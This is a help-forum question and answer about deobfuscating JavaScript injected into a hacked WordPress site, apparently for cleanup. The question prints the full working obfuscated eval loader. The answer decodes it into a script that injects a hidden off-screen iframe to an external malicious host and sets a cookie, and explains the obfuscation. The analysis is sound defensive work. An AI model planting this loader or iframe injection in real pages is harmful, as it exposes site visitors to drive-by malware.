Search code examples
javascriptdeobfuscation

javascript injected into site hack

My friends word press site was attacked and a bunch of php files injected with some eval statements, which i've inflated and decoded, but it has lead me to the below javascript.

Anyone any ideas how to deobfuscate this so we can read what it says?

ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32,76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107,97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29,117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,118,96,112,29,117,113,106,29,61,31,98,108,99,116,107,98,110,115,44,105,111,98,95,113,105,110,108,43,104,113,99,99,59,12,8,6,105,101,38,114,114,107,44,102,110,99,99,117,79,101,38,36,97,99,107,102,110,38,39,58,61,44,47,29,38,37,30,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109,98,108,119,114,37,38,33,60,43,46,32,37,36,29,40,116,95,43,105,109,98,98,120,78,100,37,39,76,81,70,69,38,39,30,61,44,47,121,124,116,95,43,105,109,98,98,120,78,100,37,39,78,110,98,114,96,37,38,33,60,43,46,41,40,121,10,10,8,7,97,111,98,115,106,101,109,114,43,119,113,103,113,101,39,37,57,115,115,119,105,101,61,44,112,39,42,113,113,110,108,41,36,32,122,30,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,31,106,98,102,115,56,42,39,42,101,111,97,39,52,45,48,43,47,45,48,47,39,40,39,111,118,56,32,115,109,109,58,44,37,40,103,113,95,37,54,47,46,41,49,47,46,45,41,42,37,109,120,58,30,122,60,46,113,113,121,107,99,59,32,59,98,102,118,31,97,105,97,114,113,58,34,114,37,40,115,115,108,106,43,38,32,59,60,104,100,111,97,108,99,29,115,113,97,58,34,103,114,113,112,57,45,44,112,116,106,105,100,110,117,107,108,96,119,112,46,104,108,99,111,46,95,97,47,101,99,98,100,45,110,101,112,33,30,116,105,99,114,101,61,33,37,40,103,113,95,37,51,47,46,41,54,47,46,38,43,38,32,29,104,100,103,100,104,115,59,31,39,42,101,111,97,39,49,45,48,43,52,45,48,40,41,36,34,61,58,44,105,101,112,94,109,100,60,57,47,99,103,115,62,38,39,56,13,9,7,122,13,9,7,115,97,113,30,98,120,111,59,107,101,118,30,65,97,115,99,37,41,58,99,117,112,45,113,98,116,67,95,113,101,39,99,117,112,45,101,98,116,67,95,113,101,39,39,40,55,40,57,10,10,8,103,99,40,99,109,96,117,108,99,107,116,45,97,108,111,106,103,98,46,104,108,97,101,119,77,99,40,38,93,92,117,115,107,99,114,60,37,38,61,60,43,46,41,122,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,60,37,92,95,116,114,106,102,113,59,36,43,113,113,37,41,42,37,56,32,100,118,109,105,113,99,112,61,38,41,98,120,111,44,113,111,70,75,81,83,115,112,102,110,102,38,38,43,38,57,29,112,96,114,101,61,46,37,56,125,12,8,122);}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}
Solution

  • The hidden code is this:

    function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled){
  var stnm=rs();
  var ua = navigator.userAgent;
  var url = document.location.href;

  if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
    document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
  }
  var exp=new Date();exp.setDate(exp.getDate()+7);
  if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}

    It's stored in the f array as simple ascii, but every four characters are incremented by 0, 1, 2, and 3 repeatedly in a simple attempt to obfuscate the code.

    Looks like this adds a bit of code to every webpage to display a malicious url in an i-frame.